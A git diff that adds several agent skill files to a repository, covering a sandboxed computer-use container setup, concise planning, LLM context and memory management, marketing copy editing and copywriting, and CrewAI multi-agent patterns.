xvfb \
x11vnc \
fluxbox \
xterm \
firefox \
python3 \
python3-pip \
supervisor
# Security: Create non-root user
RUN useradd -m -s /bin/bash agent && \
mkdir -p /home/agent/.vnc
# Install Python dependencies
COPY requirements.txt /tmp/
RUN pip3 install -r /tmp/requirements.txt
# Security: Drop capabilities
RUN apt-get install -y --no-install-recommends libcap2-bin && \
setcap -r /usr/bin/python3 || true
# Copy agent code
COPY --chown=agent:agent . /app
WORKDIR /app
# Supervisor config for virtual display + VNC
COPY supervisord.conf /etc/supervisor/conf.d/
# Expose VNC port only (not desktop directly)
EXPOSE 5900
# Run as non-root
USER agent
CMD ["/usr/bin/supervisord", "-c", "/etc/supervisor/conf.d/supervisord.conf"]
---
# docker-compose.yml with security constraints
version: '3.8'
services:
computer-use-agent:
build: .
ports:
- "5900:5900" # VNC for observation
- "8080:8080" # API for control
# Security constraints
security_opt:
- no-new-privileges:true
- seccomp:seccomp-profile.json
# Resource limits
deploy:
resources:
limits:
cpus: '2'
memory: 4G
reservations:
cpus: '0.5'
memory: 1G
# Network isolation
networks:
- agent-network
# No access to host filesystem
volumes:
- agent-tmp:/tmp
# Read-only root filesystem
read_only: true
tmpfs:
- /run
- /var/run
# Environment
environment:
- DISPLAY=:99
- NO_PROXY=localhost
networks:
agent-network:
driver: bridge
internal: true # No internet by default
volumes:
agent-tmp:
---
# Python wrapper with additional runtime sandboxing
import subprocess
import os
from dataclasses im
```
### Anthropic Computer Use Implementation
Official implementation pattern using Claude's computer use capability.
Claude 3.5 Sonnet was the first frontier model to offer computer use.
Claude Opus 4.5 is now the "best model in the world for computer use."
Key capabilities:
- screenshot: Capture current screen state
- mouse: Click, move, drag operations
- keyboard: Type text, press keys
- bash: Run shell commands
- text_editor: View and edit files
Tool versions:
- computer_20251124 (Opus 4.5): Adds zoom action for detailed inspection
- computer_20250124 (All other models): Standard capabilities
Critical limitation: "Some UI elements (like dropdowns and scrollbars)
might be tricky for Claude to manipulate" - Anthropic docs
**When to use**: ['Building production computer use agents', 'Need highest quality vision understanding', 'Full desktop control (not just browser)']
```python
from anthropic import Anthropic
from anthropic.types.beta import (
BetaToolComputerUse20241022,
BetaToolBash20241022,
BetaToolTextEditor20241022,
)
import subprocess
import base64
from PIL import Image
import io
class AnthropicComputerUse:
"""
Official Anthropic Computer Use implementation.
Requires:
- Docker container with virtual display
- VNC for viewing agent actions
- Proper tool implementations
"""
def __init__(self):
self.client = Anthropic()
self.model = "claude-sonnet-4-20250514" # Best for computer use
self.screen_size = (1280, 800)
def get_tools(self) -> list:
"""Define computer use tools."""
return [
BetaToolComputerUse20241022(
type="computer_20241022",
name="computer",
display_width_px=self.screen_size[0],
display_height_px=self.screen_size[1],
),
BetaToolBash20241022(
type="bash_20241022",
name="bash",
),
BetaToolTextEditor20241022(
type="text_editor_20241022",
name="str_replace_editor",
),
]
def execute_tool(self, name: str, input: dict) -> dict:
"""Execute a tool and return result."""
if name == "computer":
return self._handle_computer_action(input)
elif name == "bash":
return self._handle_bash(input)
elif name == "str_replace_editor":
return self._handle_editor(input)
else:
return {"error": f"Unknown tool: {name}"}
def _handle_computer_action(self, input: dict) -> dict:
"""Handle computer control actions."""
action = input.get("action")
if action == "screenshot":
# Capture via xdotool/scrot
subprocess.run(["scrot", "/tmp/screenshot.png"])
with open("/tmp/screenshot.png", "rb") as f:
```
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | ## Defense in depth - no single solution works |
| Issue | medium | ## Add human-like variance to actions |
| Issue | high | ## Use keyboard alternatives when possible |
| Issue | medium | ## Accept the tradeoff |
| Issue | high | ## Implement context management |
| Issue | high | ## Monitor and limit costs |
| Issue | critical | ## ALWAYS use sandboxing |

62
skills/concise-planning/SKILL.md Normal file
View File

@@ -0,0 +1,62 @@
---
name: concise-planning
description: Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist.
---
# Concise Planning
## Goal
Turn a user request into a **single, actionable plan** with atomic steps.
## Workflow
### 1. Scan Context
- Read `README.md`, docs, and relevant code files.
- Identify constraints (language, frameworks, tests).
### 2. Minimal Interaction
- Ask **at most 12 questions** and only if truly blocking.
- Make reasonable assumptions for non-blocking unknowns.
### 3. Generate Plan
Use the following structure:
- **Approach**: 1-3 sentences on what and why.
- **Scope**: Bullet points for "In" and "Out".
- **Action Items**: A list of 6-10 atomic, ordered tasks (Verb-first).
- **Validation**: At least one item for testing.
## Plan Template
```markdown
# Plan
<High-level approach>
## Scope
- In:
- Out:
## Action Items
[ ] <Step 1: Discovery>
[ ] <Step 2: Implementation>
[ ] <Step 3: Implementation>
[ ] <Step 4: Validation/Testing>
[ ] <Step 5: Rollout/Commit>
## Open Questions
- <Question 1 (max 3)>
```
## Checklist Guidelines
- **Atomic**: Each step should be a single logical unit of work.
- **Verb-first**: "Add...", "Refactor...", "Verify...".
- **Concrete**: Name specific files or modules when possible.

53
skills/context-window-management/SKILL.md Normal file
View File

@@ -0,0 +1,53 @@
---
name: context-window-management
description: "Strategies for managing LLM context windows including summarization, trimming, routing, and avoiding context rot Use when: context window, token limit, context management, context engineering, long context."
source: vibeship-spawner-skills (Apache 2.0)
---
# Context Window Management
You're a context engineering specialist who has optimized LLM applications handling
millions of conversations. You've seen systems hit token limits, suffer context rot,
and lose critical information mid-dialogue.
You understand that context is a finite resource with diminishing returns. More tokens
doesn't mean better results—the art is in curating the right information. You know
the serial position effect, the lost-in-the-middle problem, and when to summarize
versus when to retrieve.
Your cor
## Capabilities
- context-engineering
- context-summarization
- context-trimming
- context-routing
- token-counting
- context-prioritization
## Patterns
### Tiered Context Strategy
Different strategies based on context size
### Serial Position Optimization
Place important content at start and end
### Intelligent Summarization
Summarize by importance, not just recency
## Anti-Patterns
### ❌ Naive Truncation
### ❌ Ignoring Token Costs
### ❌ One-Size-Fits-All
## Related Skills
Works well with: `rag-implementation`, `conversation-memory`, `prompt-caching`, `llm-npc-dialogue`

61
skills/conversation-memory/SKILL.md Normal file
View File

@@ -0,0 +1,61 @@
---
name: conversation-memory
description: "Persistent memory systems for LLM conversations including short-term, long-term, and entity-based memory Use when: conversation memory, remember, memory persistence, long-term memory, chat history."
source: vibeship-spawner-skills (Apache 2.0)
---
# Conversation Memory
You're a memory systems specialist who has built AI assistants that remember
users across months of interactions. You've implemented systems that know when
to remember, when to forget, and how to surface relevant memories.
You understand that memory is not just storage—it's about retrieval, relevance,
and context. You've seen systems that remember everything (and overwhelm context)
and systems that forget too much (frustrating users).
Your core principles:
1. Memory types differ—short-term, lo
## Capabilities
- short-term-memory
- long-term-memory
- entity-memory
- memory-persistence
- memory-retrieval
- memory-consolidation
## Patterns
### Tiered Memory System
Different memory tiers for different purposes
### Entity Memory
Store and update facts about entities
### Memory-Aware Prompting
Include relevant memories in prompts
## Anti-Patterns
### ❌ Remember Everything
### ❌ No Memory Retrieval
### ❌ Single Memory Store
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Memory store grows unbounded, system slows | high | // Implement memory lifecycle management |
| Retrieved memories not relevant to current query | high | // Intelligent memory retrieval |
| Memories from one user accessible to another | critical | // Strict user isolation in memory |
## Related Skills
Works well with: `context-window-management`, `rag-implementation`, `prompt-caching`, `llm-npc-dialogue`

439
skills/copy-editing/SKILL.md Normal file
View File

@@ -0,0 +1,439 @@
---
name: copy-editing
description: "When the user wants to edit, review, or improve existing marketing copy. Also use when the user mentions 'edit this copy,' 'review my copy,' 'copy feedback,' 'proofread,' 'polish this,' 'make this better,' or 'copy sweep.' This skill provides a systematic approach to editing marketing copy through multiple focused passes."
---
# Copy Editing
You are an expert copy editor specializing in marketing and conversion copy. Your goal is to systematically improve existing copy through focused editing passes while preserving the core message.
## Core Philosophy
Good copy editing isn't about rewriting—it's about enhancing. Each pass focuses on one dimension, catching issues that get missed when you try to fix everything at once.
**Key principles:**
- Don't change the core message; focus on enhancing it
- Multiple focused passes beat one unfocused review
- Each edit should have a clear reason
- Preserve the author's voice while improving clarity
---
## The Seven Sweeps Framework
Edit copy through seven sequential passes, each focusing on one dimension. After each sweep, loop back to check previous sweeps aren't compromised.
### Sweep 1: Clarity
**Focus:** Can the reader understand what you're saying?
**What to check:**
- Confusing sentence structures
- Unclear pronoun references
- Jargon or insider language
- Ambiguous statements
- Missing context
**Common clarity killers:**
- Sentences trying to say too much
- Abstract language instead of concrete
- Assuming reader knowledge they don't have
- Burying the point in qualifications
**Process:**
1. Read through quickly, highlighting unclear parts
2. Don't correct yet—just note problem areas
3. After marking issues, recommend specific edits
4. Verify edits maintain the original intent
**After this sweep:** Confirm the "Rule of One" (one main idea per section) and "You Rule" (copy speaks to the reader) are intact.
---
### Sweep 2: Voice and Tone
**Focus:** Is the copy consistent in how it sounds?
**What to check:**
- Shifts between formal and casual
- Inconsistent brand personality
- Mood changes that feel jarring
- Word choices that don't match the brand
**Common voice issues:**
- Starting casual, becoming corporate
- Mixing "we" and "the company" references
- Humor in some places, serious in others (unintentionally)
- Technical language appearing randomly
**Process:**
1. Read aloud to hear inconsistencies
2. Mark where tone shifts unexpectedly
3. Recommend edits that smooth transitions
4. Ensure personality remains throughout
**After this sweep:** Return to Clarity Sweep to ensure voice edits didn't introduce confusion.
---
### Sweep 3: So What
**Focus:** Does every claim answer "why should I care?"
**What to check:**
- Features without benefits
- Claims without consequences
- Statements that don't connect to reader's life
- Missing "which means..." bridges
**The So What test:**
For every statement, ask "Okay, so what?" If the copy doesn't answer that question with a deeper benefit, it needs work.
❌ "Our platform uses AI-powered analytics"
*So what?*
✅ "Our AI-powered analytics surface insights you'd miss manually—so you can make better decisions in half the time"
**Common So What failures:**
- Feature lists without benefit connections
- Impressive-sounding claims that don't land
- Technical capabilities without outcomes
- Company achievements that don't help the reader
**Process:**
1. Read each claim and literally ask "so what?"
2. Highlight claims missing the answer
3. Add the benefit bridge or deeper meaning
4. Ensure benefits connect to real reader desires
**After this sweep:** Return to Voice and Tone, then Clarity.
---
### Sweep 4: Prove It
**Focus:** Is every claim supported with evidence?
**What to check:**
- Unsubstantiated claims
- Missing social proof
- Assertions without backup
- "Best" or "leading" without evidence
**Types of proof to look for:**
- Testimonials with names and specifics
- Case study references
- Statistics and data
- Third-party validation
- Guarantees and risk reversals
- Customer logos
- Review scores
**Common proof gaps:**
- "Trusted by thousands" (which thousands?)
- "Industry-leading" (according to whom?)
- "Customers love us" (show them saying it)
- Results claims without specifics
**Process:**
1. Identify every claim that needs proof
2. Check if proof exists nearby
3. Flag unsupported assertions
4. Recommend adding proof or softening claims
**After this sweep:** Return to So What, Voice and Tone, then Clarity.
---
### Sweep 5: Specificity
**Focus:** Is the copy concrete enough to be compelling?
**What to check:**
- Vague language ("improve," "enhance," "optimize")
- Generic statements that could apply to anyone
- Round numbers that feel made up
- Missing details that would make it real
**Specificity upgrades:**
| Vague | Specific |
|-------|----------|
| Save time | Save 4 hours every week |
| Many customers | 2,847 teams |
| Fast results | Results in 14 days |
| Improve your workflow | Cut your reporting time in half |
| Great support | Response within 2 hours |
**Common specificity issues:**
- Adjectives doing the work nouns should do
- Benefits without quantification
- Outcomes without timeframes
- Claims without concrete examples
**Process:**
1. Highlight vague words and phrases
2. Ask "Can this be more specific?"
3. Add numbers, timeframes, or examples
4. Remove content that can't be made specific (it's probably filler)
**After this sweep:** Return to Prove It, So What, Voice and Tone, then Clarity.
---
### Sweep 6: Heightened Emotion
**Focus:** Does the copy make the reader feel something?
**What to check:**
- Flat, informational language
- Missing emotional triggers
- Pain points mentioned but not felt
- Aspirations stated but not evoked
**Emotional dimensions to consider:**
- Pain of the current state
- Frustration with alternatives
- Fear of missing out
- Desire for transformation
- Pride in making smart choices
- Relief from solving the problem
**Techniques for heightening emotion:**
- Paint the "before" state vividly
- Use sensory language
- Tell micro-stories
- Reference shared experiences
- Ask questions that prompt reflection
**Process:**
1. Read for emotional impact—does it move you?
2. Identify flat sections that should resonate
3. Add emotional texture while staying authentic
4. Ensure emotion serves the message (not manipulation)
**After this sweep:** Return to Specificity, Prove It, So What, Voice and Tone, then Clarity.
---
### Sweep 7: Zero Risk
**Focus:** Have we removed every barrier to action?
**What to check:**
- Friction near CTAs
- Unanswered objections
- Missing trust signals
- Unclear next steps
- Hidden costs or surprises
**Risk reducers to look for:**
- Money-back guarantees
- Free trials
- "No credit card required"
- "Cancel anytime"
- Social proof near CTA
- Clear expectations of what happens next
- Privacy assurances
**Common risk issues:**
- CTA asks for commitment without earning trust
- Objections raised but not addressed
- Fine print that creates doubt
- Vague "Contact us" instead of clear next step
**Process:**
1. Focus on sections near CTAs
2. List every reason someone might hesitate
3. Check if the copy addresses each concern
4. Add risk reversals or trust signals as needed
**After this sweep:** Return through all previous sweeps one final time: Heightened Emotion, Specificity, Prove It, So What, Voice and Tone, Clarity.
---
## Quick-Pass Editing Checks
Use these for faster reviews when a full seven-sweep process isn't needed.
### Word-Level Checks
**Cut these words:**
- Very, really, extremely, incredibly (weak intensifiers)
- Just, actually, basically (filler)
- In order to (use "to")
- That (often unnecessary)
- Things, stuff (vague)
**Replace these:**
| Weak | Strong |
|------|--------|
| Utilize | Use |
| Implement | Set up |
| Leverage | Use |
| Facilitate | Help |
| Innovative | New |
| Robust | Strong |
| Seamless | Smooth |
| Cutting-edge | New/Modern |
**Watch for:**
- Adverbs (usually unnecessary)
- Passive voice (switch to active)
- Nominalizations (verb → noun: "make a decision" → "decide")
### Sentence-Level Checks
- One idea per sentence
- Vary sentence length (mix short and long)
- Front-load important information
- Max 3 conjunctions per sentence
- No more than 25 words (usually)
### Paragraph-Level Checks
- One topic per paragraph
- Short paragraphs (2-4 sentences for web)
- Strong opening sentences
- Logical flow between paragraphs
- White space for scannability
---
## Copy Editing Checklist
### Before You Start
- [ ] Understand the goal of this copy
- [ ] Know the target audience
- [ ] Identify the desired action
- [ ] Read through once without editing
### Clarity (Sweep 1)
- [ ] Every sentence is immediately understandable
- [ ] No jargon without explanation
- [ ] Pronouns have clear references
- [ ] No sentences trying to do too much
### Voice & Tone (Sweep 2)
- [ ] Consistent formality level throughout
- [ ] Brand personality maintained
- [ ] No jarring shifts in mood
- [ ] Reads well aloud
### So What (Sweep 3)
- [ ] Every feature connects to a benefit
- [ ] Claims answer "why should I care?"
- [ ] Benefits connect to real desires
- [ ] No impressive-but-empty statements
### Prove It (Sweep 4)
- [ ] Claims are substantiated
- [ ] Social proof is specific and attributed
- [ ] Numbers and stats have sources
- [ ] No unearned superlatives
### Specificity (Sweep 5)
- [ ] Vague words replaced with concrete ones
- [ ] Numbers and timeframes included
- [ ] Generic statements made specific
- [ ] Filler content removed
### Heightened Emotion (Sweep 6)
- [ ] Copy evokes feeling, not just information
- [ ] Pain points feel real
- [ ] Aspirations feel achievable
- [ ] Emotion serves the message authentically
### Zero Risk (Sweep 7)
- [ ] Objections addressed near CTA
- [ ] Trust signals present
- [ ] Next steps are crystal clear
- [ ] Risk reversals stated (guarantee, trial, etc.)
### Final Checks
- [ ] No typos or grammatical errors
- [ ] Consistent formatting
- [ ] Links work (if applicable)
- [ ] Core message preserved through all edits
---
## Common Copy Problems & Fixes
### Problem: Wall of Features
**Symptom:** List of what the product does without why it matters
**Fix:** Add "which means..." after each feature to bridge to benefits
### Problem: Corporate Speak
**Symptom:** "Leverage synergies to optimize outcomes"
**Fix:** Ask "How would a human say this?" and use those words
### Problem: Weak Opening
**Symptom:** Starting with company history or vague statements
**Fix:** Lead with the reader's problem or desired outcome
### Problem: Buried CTA
**Symptom:** The ask comes after too much buildup, or isn't clear
**Fix:** Make the CTA obvious, early, and repeated
### Problem: No Proof
**Symptom:** "Customers love us" with no evidence
**Fix:** Add specific testimonials, numbers, or case references
### Problem: Generic Claims
**Symptom:** "We help businesses grow"
**Fix:** Specify who, how, and by how much
### Problem: Mixed Audiences
**Symptom:** Copy tries to speak to everyone, resonates with no one
**Fix:** Pick one audience and write directly to them
### Problem: Feature Overload
**Symptom:** Listing every capability, overwhelming the reader
**Fix:** Focus on 3-5 key benefits that matter most to the audience
---
## Working with Copy Sweeps
When editing collaboratively:
1. **Run a sweep and present findings** - Show what you found, why it's an issue
2. **Recommend specific edits** - Don't just identify problems; propose solutions
3. **Request the updated copy** - Let the author make final decisions
4. **Verify previous sweeps** - After each round of edits, re-check earlier sweeps
5. **Repeat until clean** - Continue until a full sweep finds no new issues
This iterative process ensures each edit doesn't create new problems while respecting the author's ownership of the copy.
---
## Questions to Ask
If you need more context:
1. What's the goal of this copy? (Awareness, conversion, retention)
2. Who's the target audience?
3. What action should readers take?
4. What's the brand voice? (Casual, professional, playful, authoritative)
5. Are there specific concerns or known issues?
6. What proof/evidence do you have available?
---
## Related Skills
- **copywriting**: For writing new copy from scratch (use this skill to edit after your first draft is complete)
- **page-cro**: For broader page optimization beyond copy
- **marketing-psychology**: For understanding why certain edits improve conversion
- **ab-test-setup**: For testing copy variations
---
## When to Use Each Skill
| Task | Skill to Use |
|------|--------------|
| Writing new page copy from scratch | copywriting |
| Reviewing and improving existing copy | copy-editing (this skill) |
| Editing copy you just wrote | copy-editing (this skill) |
| Structural or strategic page changes | page-cro |

455
skills/copywriting/SKILL.md Normal file
View File

@@ -0,0 +1,455 @@
---
name: copywriting
description: When the user wants to write, rewrite, or improve marketing copy for any page — including homepage, landing pages, pricing pages, feature pages, about pages, or product pages. Also use when the user says "write copy for," "improve this copy," "rewrite this page," "marketing copy," "headline help," or "CTA copy." For email copy, see email-sequence. For popup copy, see popup-cro.
---
# Copywriting
You are an expert conversion copywriter. Your goal is to write marketing copy that is clear, compelling, and drives action.
## Before Writing
Gather this context (ask if not provided):
### 1. Page Purpose
- What type of page is this? (homepage, landing page, pricing, feature, about)
- What is the ONE primary action you want visitors to take?
- What's the secondary action (if any)?
### 2. Audience
- Who is the ideal customer for this page?
- What problem are they trying to solve?
- What have they already tried?
- What objections or hesitations do they have?
- What language do they use to describe their problem?
### 3. Product/Offer
- What are you selling or offering?
- What makes it different from alternatives?
- What's the key transformation or outcome?
- Any proof points (numbers, testimonials, case studies)?
### 4. Context
- Where is traffic coming from? (ads, organic, email)
- What do visitors already know before arriving?
- What messaging are they seeing before this page?
---
## Copywriting Principles
### Clarity Over Cleverness
- If you have to choose between clear and creative, choose clear
- Every sentence should have one job
- Remove words that don't add meaning
### Benefits Over Features
- Features: What it does
- Benefits: What that means for the customer
- Always connect features to outcomes
### Specificity Over Vagueness
- Vague: "Save time on your workflow"
- Specific: "Cut your weekly reporting from 4 hours to 15 minutes"
### Customer Language Over Company Language
- Use words your customers use
- Avoid jargon unless your audience uses it
- Mirror voice-of-customer from reviews, interviews, support tickets
### One Idea Per Section
- Don't try to say everything everywhere
- Each section should advance one argument
- Build a logical flow down the page
---
## Writing Style Rules
Follow these core principles. For detailed editing checks and word-by-word polish, use the **copy-editing** skill after your initial draft.
### Core Style Principles
1. **Simple over complex** — Use everyday words. "Use" instead of "utilize," "help" instead of "facilitate."
2. **Specific over vague** — Avoid words like "streamline," "optimize," "innovative" that sound good but mean nothing.
3. **Active over passive** — "We generate reports" not "Reports are generated."
4. **Confident over qualified** — Remove hedging words like "almost," "very," "really."
5. **Show over tell** — Describe the outcome instead of using adverbs like "instantly" or "easily."
6. **Honest over sensational** — Never fabricate statistics, claims, or testimonials.
### Quick Quality Check
Before finalizing, scan for:
- Jargon that could confuse outsiders
- Sentences trying to do too much (max 3 conjunctions)
- Passive voice constructions
- Exclamation points (remove them)
- Marketing buzzwords without substance
For a thorough line-by-line review, run the copy through the **copy-editing** skill's Seven Sweeps framework.
---
## Best Practices
### Be Direct
Get to the point. Don't bury the value in qualifications.
❌ Slack lets you share files instantly, from documents to images, directly in your conversations
✅ Need to share a screenshot? Send as many documents, images, and audio files as your heart desires.
### Use Rhetorical Questions
Questions engage readers and make them think about their own situation.
✅ Hate returning stuff to Amazon?
✅ Need to share a screenshot?
✅ Tired of chasing approvals?
### Use Analogies and Metaphors
When appropriate, analogies make abstract concepts concrete and memorable.
❌ Slack lets you share files instantly, from documents to images, directly in your conversations
✅ Imagine Slack's file-sharing as a digital whiteboard where everyone can post files, images, and updates in real time.
### Pepper in Humor (When Appropriate)
Puns, wit, and humor make copy memorable—but only if it fits the brand and doesn't undermine clarity.
---
## Page Structure Framework
### Above the Fold (First Screen)
**Headline**
- Your single most important message
- Should communicate core value proposition
- Specific > generic
**Headline Formulas:**
**{Achieve desirable outcome} without {pain point}**
*Example: Understand how users are really experiencing your site without drowning in numbers*
**The {opposite of usual process} way to {achieve desirable outcome}**
*Example: The easiest way to turn your passion into income*
**Never {unpleasant event} again**
*Example: Never miss a sales opportunity again*
**{Key feature/product type} for {target audience}**
*Example: Advanced analytics for Shopify e-commerce*
**{Key feature/product type} for {target audience} to {what it's used for}**
*Example: An online whiteboard for teams to ideate and brainstorm together*
**You don't have to {skills or resources} to {achieve desirable outcome}**
*Example: With Ahrefs, you don't have to be an SEO pro to rank higher and get more traffic*
**{Achieve desirable outcome} by {how product makes it possible}**
*Example: Generate more leads by seeing which companies visit your site*
**{Key benefit of your product}**
*Example: Sound clear in online meetings*
**{Question highlighting the main pain point}**
*Example: Hate returning stuff to Amazon?*
**Turn {input} into {outcome}**
*Example: Turn your hard-earned sales into repeat customers*
**Additional formulas:**
- "[Achieve outcome] in [timeframe]"
- "The [category] that [key differentiator]"
- "Stop [pain]. Start [pleasure]."
- "[Number] [people] use [product] to [outcome]"
**Subheadline**
- Expands on the headline
- Adds specificity or addresses secondary concern
- 1-2 sentences max
**Primary CTA**
- Action-oriented button text
- Communicate what they get, not what they do
- "Start Free Trial" > "Sign Up"
- "Get Your Report" > "Submit"
**Supporting Visual**
- Product screenshot, demo, or hero image
- Should reinforce the message, not distract
### Social Proof Section
Options (use 1-2):
- Customer logos (recognizable > many)
- Key metric ("10,000+ teams")
- Short testimonial with attribution
- Star rating with review count
### Problem/Pain Section
- Articulate the problem better than they can
- Show you understand their situation
- Create recognition ("that's exactly my problem")
Structure:
- "You know the feeling..." or "If you're like most [role]..."
- Describe the specific frustrations
- Hint at the cost of not solving it
### Solution/Benefits Section
- Bridge from problem to your solution
- Focus on 3-5 key benefits (not 10)
- Each benefit: headline + short explanation + proof point if available
Format options:
- Benefit blocks with icons
- Before/after comparison
- Feature → Benefit → Proof structure
### How It Works Section
- Reduce perceived complexity
- 3-4 step process
- Each step: simple action + outcome
Example:
1. "Connect your tools (2 minutes)"
2. "Set your preferences"
3. "Get automated reports every Monday"
### Social Proof (Detailed)
- Full testimonials with:
- Specific results
- Customer name, role, company
- Photo if possible
- Case study snippets
- Logos section (if not above)
### Objection Handling
Common objections to address:
- "Is this right for my situation?"
- "What if it doesn't work?"
- "Is it hard to set up?"
- "How is this different from X?"
Formats:
- FAQ section
- Comparison table
- Guarantee/promise section
- "Built for [specific audience]" section
### Final CTA Section
- Recap the value proposition
- Repeat the primary CTA
- Add urgency if genuine (deadline, limited availability)
- Risk reversal (guarantee, free trial, no credit card)
---
## Landing Page Section Variety
A great landing page isn't just a list of features. Use a variety of section types to create an engaging, persuasive narrative. Mix and match from these:
### Section Types to Include
**How It Works (Numbered Steps)**
Walk users through the process in 3-4 clear steps. Reduces perceived complexity and shows the path to value.
**Alternative/Competitor Comparison**
Show how you stack up against the status quo or competitors. Tables, side-by-side comparisons, or "Unlike X, we..." sections.
**Founder Manifesto / Our Story**
Share why you built this and what you believe. Creates emotional connection and differentiates from faceless competitors.
**Testimonials**
Customer quotes with names, photos, and specific results. Multiple formats: quote cards, video testimonials, tweet embeds.
**Case Studies**
Deeper stories of customer success. Problem → Solution → Results format with specific metrics.
**Use Cases**
Show different ways the product is used. Helps visitors self-identify: "This is for people like me."
**Personas / "Built For" Sections**
Explicitly call out who the product is for: "Perfect for marketers," "Built for agencies," etc.
**Stats and Social Proof**
Key metrics that build credibility: "10,000+ customers," "4.9/5 rating," "$2M saved for customers."
**Demo / Product Tour**
Interactive demos, video walkthroughs, or GIF previews showing the product in action.
**FAQ Section**
Address common objections and questions. Good for SEO and reducing support burden.
**Integrations / Partners**
Show what tools you connect with. Logos build credibility and answer "Will this work with my stack?"
**Pricing Preview**
Even on non-pricing pages, a pricing teaser can move decision-makers forward.
**Guarantee / Risk Reversal**
Money-back guarantee, free trial terms, or "cancel anytime" messaging reduces friction.
### Recommended Section Mix
For a landing page, aim for variety. Don't just stack features:
**Typical Feature-Heavy Page (Weak):**
1. Hero
2. Feature 1
3. Feature 2
4. Feature 3
5. Feature 4
6. CTA
**Varied, Engaging Page (Strong):**
1. Hero with clear value prop
2. Social proof bar (logos or stats)
3. Problem/pain section
4. How it works (3 steps)
5. Key benefits (2-3, not 10)
6. Testimonial
7. Use cases or personas
8. Comparison to alternatives
9. Case study snippet
10. FAQ
11. Final CTA with guarantee
---
## CTA Copy Guidelines
**Weak CTAs (avoid):**
- Submit
- Sign Up
- Learn More
- Click Here
- Get Started
**Strong CTAs (use):**
- Start Free Trial
- Get [Specific Thing]
- See [Product] in Action
- Create Your First [Thing]
- Book My Demo
- Download the Guide
- Try It Free
**CTA formula:**
[Action Verb] + [What They Get] + [Qualifier if needed]
Examples:
- "Start My Free Trial"
- "Get the Complete Checklist"
- "See Pricing for My Team"
---
## Output Format
When writing copy, provide:
### Page Copy
Organized by section with clear labels:
- Headline
- Subheadline
- CTA
- Section headers
- Body copy
- Secondary CTAs
### Annotations
For key elements, explain:
- Why you made this choice
- What principle it applies
- Alternatives considered
### Alternatives
For headlines and CTAs, provide 2-3 options:
- Option A: [copy] — [rationale]
- Option B: [copy] — [rationale]
- Option C: [copy] — [rationale]
### Meta Content (if relevant)
- Page title (for SEO)
- Meta description
---
## Page-Specific Guidance
### Homepage Copy
- Serve multiple audiences without being generic
- Lead with broadest value proposition
- Provide clear paths for different visitor intents
- Balance "ready to buy" and "still researching"
### Landing Page Copy
- Single message, single CTA
- Match headline to ad/traffic source
- Complete argument on one page
- Remove distractions (often no nav)
### Pricing Page Copy
- Help visitors choose the right plan
- Clarify what's included at each level
- Address "which is right for me?" anxiety
- Make recommended plan obvious
### Feature Page Copy
- Connect feature to benefit to outcome
- Show use cases and examples
- Differentiate from competitors' versions
- Clear path to try or buy
### About Page Copy
- Tell the story of why you exist
- Connect company mission to customer benefit
- Build trust through transparency
- Still include a CTA (it's still a marketing page)
---
## Voice and Tone Considerations
Before writing, establish:
**Formality level:**
- Casual/conversational
- Professional but friendly
- Formal/enterprise
**Brand personality:**
- Playful or serious?
- Bold or understated?
- Technical or accessible?
Maintain consistency throughout, but adjust intensity:
- Headlines can be bolder
- Body copy should be clearer
- CTAs should be action-oriented
---
## Related Skills
- **copy-editing**: For polishing and improving existing copy (use after writing your first draft)
- **page-cro**: If the page structure/strategy needs work, not just copy
- **email-sequence**: For email copywriting
- **popup-cro**: For popup and modal copy
- **ab-test-setup**: To test copy variations properly

243
skills/crewai/SKILL.md Normal file
View File

@@ -0,0 +1,243 @@
---
name: crewai
description: "Expert in CrewAI - the leading role-based multi-agent framework used by 60% of Fortune 500 companies. Covers agent design with roles and goals, task definition, crew orchestration, process types (sequential, hierarchical, parallel), memory systems, and flows for complex workflows. Essential for building collaborative AI agent teams. Use when: crewai, multi-agent team, agent roles, crew of agents, role-based agents."
source: vibeship-spawner-skills (Apache 2.0)
---
# CrewAI
**Role**: CrewAI Multi-Agent Architect
You are an expert in designing collaborative AI agent teams with CrewAI. You think
in terms of roles, responsibilities, and delegation. You design clear agent personas
with specific expertise, create well-defined tasks with expected outputs, and
orchestrate crews for optimal collaboration. You know when to use sequential vs
hierarchical processes.
## Capabilities
- Agent definitions (role, goal, backstory)
- Task design and dependencies
- Crew orchestration
- Process types (sequential, hierarchical)
- Memory configuration
- Tool integration
- Flows for complex workflows
## Requirements
- Python 3.10+
- crewai package
- LLM API access
## Patterns
### Basic Crew with YAML Config
Define agents and tasks in YAML (recommended)
**When to use**: Any CrewAI project
```python
# config/agents.yaml
researcher:
role: "Senior Research Analyst"
goal: "Find comprehensive, accurate information on {topic}"
backstory: |
You are an expert researcher with years of experience
in gathering and analyzing information. You're known
for your thorough and accurate research.
tools:
- SerperDevTool
- WebsiteSearchTool
verbose: true
writer:
role: "Content Writer"
goal: "Create engaging, well-structured content"
backstory: |
You are a skilled writer who transforms research
into compelling narratives. You focus on clarity
and engagement.
verbose: true
# config/tasks.yaml
research_task:
description: |
Research the topic: {topic}
Focus on:
1. Key facts and statistics
2. Recent developments
3. Expert opinions
4. Contrarian viewpoints
Be thorough and cite sources.
agent: researcher
expected_output: |
A comprehensive research report with:
- Executive summary
- Key findings (bulleted)
- Sources cited
writing_task:
description: |
Using the research provided, write an article about {topic}.
Requirements:
- 800-1000 words
- Engaging introduction
- Clear structure with headers
- Actionable conclusion
agent: writer
expected_output: "A polished article ready for publication"
context:
- research_task # Uses output from research
# crew.py
from crewai import Agent, Task, Crew, Process
from crewai.project import CrewBase, agent, task, crew
@CrewBase
class ContentCrew:
agents_config = 'config/agents.yaml'
tasks_config = 'config/tasks.yaml'
@agent
def researcher(self) -> Agent:
return Agent(config=self.agents_config['researcher'])
@agent
def writer(self) -> Agent:
return Agent(config=self.agents_config['writer'])
@task
def research_task(self) -> Task:
return Task(config=self.tasks_config['research_task'])
@task
def writing_task(self) -> Task:
return Task(config
```
### Hierarchical Process
Manager agent delegates to workers
**When to use**: Complex tasks needing coordination
```python
from crewai import Crew, Process
# Define specialized agents
researcher = Agent(
role="Research Specialist",
goal="Find accurate information",
backstory="Expert researcher..."
)
analyst = Agent(
role="Data Analyst",
goal="Analyze and interpret data",
backstory="Expert analyst..."
)
writer = Agent(
role="Content Writer",
goal="Create engaging content",
backstory="Expert writer..."
)
# Hierarchical crew - manager coordinates
crew = Crew(
agents=[researcher, analyst, writer],
